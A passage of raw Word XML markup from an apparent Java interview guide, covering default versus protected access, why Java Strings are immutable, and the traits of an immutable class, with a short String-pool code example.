          </w:tcPr>
          <w:p w14:paraId="2BFE23E6" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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 by subclasses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FB3EE51" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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t accessible outside the package, even in subclasses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44CA895E" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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ccessible by subclasses (same package or different package)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2ABA" w:rsidRPr="00CE4B95" w14:paraId="437DB45C" w14:textId="77777777" w:rsidTr="00961A43">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36C24703" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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heritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="562B07BE" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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embers are not inherited by subclasses in other packages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BD4F311" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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embers can be inherited by subclasses (same package or different package)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2ABA" w:rsidRPr="00CE4B95" w14:paraId="569D9D46" w14:textId="77777777" w:rsidTr="00961A43">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="487CF773" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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ase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D2DE24C" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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ypically used when you want to limit access to the package scope only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="644F708C" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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when you want to allow access to subclasses (even in other packages)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77A76E47" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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6D3E908D" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40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ault (Package-Private)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used when you want a class or member to be accessible only within the same package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C6DAE" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40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otected</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used when you want the class or member to be accessible within the same package and by subclasses, even if they are in different packages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCB1E2E" w14:textId="211779C7"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5D0AA06">
          <v:rect id="_x0000_i1185" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C470FEE" w14:textId="1355CF93" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="007150EE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc196307538"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why is string immutable</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="44601B90" w14:textId="1C9591CF" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is immutable, which means that once a String object is created, its value cannot be changed. This immutability provides several important benefits in terms of performance, security, and thread safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360E44CC" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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Reasons why String is immutable in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7205A6" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4F8C58" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ring objects are often used in security-sensitive operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as in file paths, network connections, database queries, or even user authentication (passwords). If Strings were mutable, an attacker could alter their value while it is in use, leading to potential security vulnerabilities. By making Strings immutable, we ensure that their value cannot be modified once they are created, which helps maintain the integrity of sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC7DA0C" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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Caching and Performance Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0104BC2E" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ring pooling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a technique in Java that helps save memory by reusing existing string objects rather than creating new ones every time a string is encountered. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also called the "String Literal Pool") stores string literals in a special pool to avoid redundancy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB3DE92" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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cause Strings are immutable, they can safely be shared across multiple parts of a program without any risk of one part altering the string, which would affect other parts of the program using the same string. This enhances performance and saves memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686E40CF" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ince Strings are immutable, they can be used as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>keys in hash-based collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like HashMap, HashSet, etc., because their hash codes remain constant throughout their existence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B92C43" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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Thread Safety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E3ED71" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41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mmutable objects are inherently thread-safe.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This means that multiple threads can safely access a String object without any synchronization needed because the value of the String cannot be modified after it is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D18DF7F" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41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example, in multi-threaded applications, the immutability of Strings guarantees that no thread can change the value of a String object, thus avoiding concurrency issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E42BDA3" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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Simplicity and Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41720063" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41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mutability simplifies debugging and reasoning about the program because once a String is created, its value is fixed. This reduces the chance of accidental changes to its value, which could lead to subtle bugs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D85BE90" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41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It makes the code </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reliable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because any operations that involve strings will always yield the same result for the same input values, reducing errors in string manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEC8A08" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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Hashing Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73782813" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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rings are widely used in hash-based collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like HashMap or HashSet. In such collections, the hash value of an object is used to quickly locate the object. If a string were mutable, its hash value could change, leading to incorrect behavior in these collections. By making String immutable, the hash value remains constant throughout the life of the object, ensuring the consistency and reliability of hash-based collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A65291" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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Immutability and Optimized Memory Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBA73A4" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ce Strings are immutable, Java can optimize memory usage by sharing String objects across multiple references. For example, if the same string value is used multiple times in a program, Java can point all references to the same memory location for that string, rather than creating multiple copies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F35B28" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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is particularly important when dealing with large amounts of text data, where memory efficiency is crucial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFCDBAE" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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22848D5C" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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tringImmutability {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522FD2AB" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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0FB1D892" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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str1 = "Hello";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE027A" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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str2 = "Hello";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E41C6F4" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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C7A672B" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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Both str1 and str2 point to the same object in the String pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED49F03" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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tr1 == str2);  // true, both refer to the same object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE4E704" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="317F75BF" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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ttempt to modify str1 (since Strings are immutable, this creates a new object)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D4EC71" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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1 = str1.concat(" World");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607F6C89" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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373BA89" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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Now str1 points to a new String object, while str2 still points to the original "Hello"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C7E06D" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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tr1);  // Hello World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F99A73" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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tr2);  // Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A71A58" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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tr1 == str2);  // false, as str1 and str2 refer to different objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAAA9BE" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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03E9699" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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C242461" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31946AF1" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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itially, both str1 and str2 point to the same object in the String pool because of the String literal "Hello".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D760E4" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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we call concat() on str1, it creates a new String object because Strings are immutable. The original str2 remains unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ACCD4A" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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4A4C6E24" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:jc w:val="both"/>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The immutability of Strings in Java is a design decision that helps in optimizing memory usage, improving performance, enhancing security, and ensuring thread safety. It simplifies code maintenance and debugging and allows for efficient use of String objects across different parts of a program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABF4BB5" w14:textId="40855C2B"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BF2110F">
          <v:rect id="_x0000_i1186" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB4442B" w14:textId="3218D511" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="00B9670B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc196307539"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is an immutable class</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="4B82C2EE" w14:textId="16D17573" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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n </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immutable class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is a class whose objects cannot be modified once they are created. The state (fields or properties) of an immutable object is set only during object creation, and after that, it cannot be changed. The immutability of a class provides several benefits, such as thread safety, easier debugging, and improved security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727CFAA0" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6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haracteristics of an Immutable Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA7C7FB" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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nal class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AFCBC4" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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class is typically declared as final to prevent subclassing. This ensures that the behavior of the immutable class cannot be altered by subclassing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D28E10A" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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final class ImmutableClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344E175F" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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lass body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E37014" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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A4F7D90" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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nal fields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3690F666" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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All the fields of the class are declared as final, meaning that once they are assigned a value, they cannot be modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72496EE8" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ivate final String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0630C1E8" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ivate final int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178B8C11" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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setter methods:</w:t>
      </w:r>
    </w:p>
